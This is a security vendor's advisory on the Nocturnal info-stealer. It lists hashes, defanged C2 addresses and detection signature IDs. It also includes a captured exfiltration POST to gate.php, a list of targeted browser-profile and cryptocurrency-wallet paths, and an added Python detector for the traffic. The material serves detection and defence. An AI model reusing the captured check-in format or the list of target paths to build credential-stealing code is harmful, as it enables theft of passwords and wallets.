Wins Security Information

Malware Info: Win32/Spyware.Nocturnal
Date: 2018-06-05

ㅁ Malware IoC

 - Pattern  : Win32/Spyware.Nocturnal
 - Filename : -
 - Type     : exe
 - Size     : 2,159,648 bytes
 - MD5      : ba034519c07bfa65aa810a805508f293

ㅁ Malware Traffic

POST /line/?fields=query HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
User-Agent: Nocturnal/1.0
Host: ip-api.com
Connection: Keep-Alive
Cache-Control: no-cache

--[Removed]--

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Date: Tue, 05 Jun 2018 02:35:44 GMT
Content-Length: 14

[Ip_Removed]

POST /server/gate.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 3299
User-Agent: Nocturnal/1.0
Host: nctrnl.us
Connection: Keep-Alive
Cache-Control: no-cache

--[Removed]
Content-Disposition: form-data; name="hwid"

[Removed]
--[Removed]
Content-Disposition: form-data; name="os"

[Removed]
--[Removed]
Content-Disposition: form-data; name="platform"

[Removed]
--[Removed]
Content-Disposition: form-data; name="profile"

[Removed]
--[Removed]
Content-Disposition: form-data; name="user"

[Removed]
--[Removed]
Content-Disposition: form-data; name="pcount"

0
--[Removed]
Content-Disposition: form-data; name="cccount"

0
--[Removed]
Content-Disposition: form-data; name="ccount"

0
--[Removed]
Content-Disposition: form-data; name="logs"; filename="[Removed].zip"
Content-Type: zip

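Added example (not code from the page or from Wins): a small Python detector that applies the indicators visible in the capture above (the Nocturnal/1.0 User-Agent, the /server/gate.php path, and the multipart field names of the exfiltration form) to raw HTTP requests. The sample requests in the block are constructed, not real captures; the ip-api.com lookup is flagged only together with another indicator, since that service is legitimate on its own.

```python
import re
NOCTURNAL_UA = "Nocturnal/1.0"          # indicators from the capture above
GATE_PATH = "/server/gate.php"
GATE_FIELDS = {"hwid", "os", "platform", "profile", "user",
               "pcount", "cccount", "ccount", "logs"}

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path = lines[0].split(" ", 2)[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def multipart_field_names(headers, body):
    """Return the form-data field names present in a multipart body."""
    if "multipart/form-data" not in headers.get("content-type", ""):
        return set()
    return set(re.findall(r'form-data; name="([^"]+)"', body))

def classify(raw):
    """Return the reasons (possibly none) a request matches Nocturnal."""
    method, path, headers, body = parse_request(raw)
    reasons = []
    if headers.get("user-agent") == NOCTURNAL_UA:
        reasons.append("stealer user-agent")
    if method == "POST" and path == GATE_PATH:
        reasons.append("post to gate.php")
    # Require several of the exfil form fields, not just one common name.
    if len(multipart_field_names(headers, body) & GATE_FIELDS) >= 3:
        reasons.append("gate.php exfil form fields")
    # ip-api.com is a legitimate service; flag it only alongside another hit.
    if reasons and headers.get("host") == "ip-api.com" and "fields=" in path:
        reasons.append("geolocation lookup with stealer user-agent")
    return reasons

GATE_REQUEST = (  # constructed sample modelled on the capture, not a real one
    "POST /server/gate.php HTTP/1.1\r\nHost: nctrnl.us\r\n"
    "User-Agent: Nocturnal/1.0\r\n"
    "Content-Type: multipart/form-data; boundary=XX\r\n\r\n"
    '--XX\r\nContent-Disposition: form-data; name="hwid"\r\n\r\nx\r\n'
    '--XX\r\nContent-Disposition: form-data; name="pcount"\r\n\r\n0\r\n'
    '--XX\r\nContent-Disposition: form-data; name="logs"; filename="l.zip"\r\n'
)
GEO_REQUEST = ("POST /line/?fields=query HTTP/1.1\r\n"       # constructed
               "User-Agent: Nocturnal/1.0\r\nHost: ip-api.com\r\n\r\n")
```

Run `classify()` over reassembled HTTP requests from a proxy or IDS stream; a non-empty result is a hit on this family's check-in pattern.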

ㅁ Malware String

 - ASCII : files/passwords.txt
 - ASCII : Bitcoin/wallet.dat
 - ASCII : Ethereum/keystore
 - ASCII : Electrum/wallets/default_wallet
 - ASCII : Electrum-LTC/wallets/default_wallet
 - ASCII : Exodus/exodus.wallet
 - ASCII : YACoin/wallet.dat
 - ASCII : /files/filezilla_recentservers.xml
 - ASCII : /Google/Chrome/User Data/
 - ASCII : /Chromium/User Data/
 - ASCII : /Kometa/User Data/
 - ASCII : /Amigo/User Data/
 - ASCII : /Torch/User Data/
 - ASCII : /Orbitum/User Data/
 - ASCII : /Opera Software/Opera Stable/User Data/
 - ASCII : /Comodo/Dragon/User Data/
 - ASCII : /Nichrome/User Data/
 - ASCII : /Yandex/YandexBrowser/User Data/
 - ASCII : /Maxthon5/Users/
 - ASCII : /Sputnik/User Data/
 - ASCII : /Epic Privacy Browser/User Data/
 - ASCII : /Vivaldi/User Data/
 - ASCII : /CocCoc/Browser/User Data/
 - ASCII : /Mozilla/Firefox/Profiles/
 - ASCII : /Moonchild Productions/Pale Moon/Profiles/
 - ASCII : /Waterfox/Profiles/
 - ASCII : /8pecxstudios/Cyberfox/Profiles/
 - ASCII : /NETGATE Technologies/BlackHawk/Profiles/
 - ASCII : /Mozilla/icecat/Profiles/
 - ASCII : /K-Meleon/

ㅁ Malware C2

 - [Port 80, POST] hxxp://ip-api[.]com/line/?fields=query
 - [Port 80, POST] hxxp://ip-api[.]com/line/?fields=countryCode
 - [Port 80, POST] hxxp://nctrnl[.]us/server/gate.php

ㅁ Malware Hash

 - ae7e5a7b34dc216e9da384fcf9868ab2c1a1d731f583f893b2d2d4009da15a4e

ㅁ Wins Sniper Pattern

 - [4342] Win32/Spyware.Nocturnal.Connection
 - [4343] Win32/Spyware.Nocturnal.2186392
 - [4344] Win32/Spyware.Nocturnal.1891280
 - [4345] Win32/Spyware.Nocturnal.2159648

ㅁ Wins APTX

Source

https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap

Attachments: none
Tags: Spyware, Nocturnal, Malware Info